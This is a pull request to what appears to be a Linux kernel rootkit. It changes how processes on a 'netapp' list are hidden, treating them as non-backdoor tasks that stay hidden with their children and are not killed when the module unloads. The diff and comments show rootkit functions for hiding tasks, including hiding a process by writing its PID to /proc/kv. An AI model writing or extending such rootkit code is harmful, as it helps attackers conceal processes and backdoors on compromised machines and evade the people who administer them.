### PR TITLE
Change behaviour for netapp tasks

### DIFF
--- a/src/netapp.h
+++ b/src/netapp.h
@@ -4,6 +4,7 @@
  /*
   * The names below are just examples and can be
   * modified and/or extended at will
+  * warning: don't add backdoor programs here
  */
 static const char *netapp_list[] = {
     "whitenose", "pinknose", "rednose", "blacknose",

--- a/src/pid.c
+++ b/src/pid.c
@@ -472,10 +472,12 @@ void kv_scan_and_hide_netapp(void) {
             prinfo("Hide netapp task: %d %s i=%d '%s'\n", t->pid, fnode->filename, i, netapp_list[i]);
             /**
              * notice that any netapp added here
-             * will be killed if
-             * rk is unloaded so we won't leave traces behind
+             * will NOT be killed if kv is unloaded
+             * In reality an application that is listed in netapp_list will be handled
+             * in the same way as if you manually hide a parent process:
+             *  echo <pid of parent> >/proc/kv
              */
-            kv_hide_task_by_pid(t->pid, 1 /* handle as backdoor */, CHILDREN /* hide children */);
+            kv_hide_task_by_pid(t->pid, 0 /* not a backdoor */, CHILDREN /* hide children */);
             break;
         }
 


### PR DESCRIPTION
There was a silent bug here found in #84
Although I don't address that issue here, handling netapps as if they were backdoors will have the side effect of having all of its children killed if a subprocess exits.